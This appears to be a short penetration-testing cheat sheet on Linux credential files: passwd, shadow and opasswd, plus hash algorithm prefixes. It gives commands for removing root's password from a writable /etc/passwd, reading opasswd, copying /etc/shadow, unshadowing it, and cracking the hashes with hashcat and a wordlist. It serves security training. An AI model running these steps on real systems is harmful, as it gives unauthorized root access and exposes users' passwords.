Passwd, Shadow & Opasswd
Passwd File
# It the /etc/passwd file is writable by us
# Editing /etc/passwd - Before
root:x:0:0:root:/root:/bin/bash
# Editing /etc/passwd - After
root::0:0:root:/root:/bin/bashShadow File
If the password field contains a character, such as ! or * the user cannot log in with a Unix password. However, other authentication methods for logging in, such as Kerberos or key-based authentication, can still be used.
Algorithm Types
$1$– MD5$2a$– Blowfish$2y$– Eksblowfish$5$– SHA-256$6$– SHA-512
Opasswd
The PAM library (pam_unix.so) can prevent reusing old passwords. The file where old passwords are stored is the /etc/security/opasswd. Administrator/root permissions are also required to read the file if the permissions for this file have not been changed manually.
# Reading /etc/security/opasswd
sudo cat /etc/security/opasswdCracking Linux Credentials
Unshadow
sudo cp /etc/passwd /tmp/passwd.bak
sudo cp /etc/shadow /tmp/shadow.bak
unshadow /tmp/passwd.bak /tmp/shadow.bak > /tmp/unshadowed.hashesHashcat - Cracking Unshadowed Hashes
hashcat -m 1800 -a 0 /tmp/unshadowed.hashes rockyou.txt -o /tmp/unshadowed.crackedHashcat - Cracking MD5 Hashes
hashcat -m 500 -a 0 md5-hashes.list rockyou.txtLast updated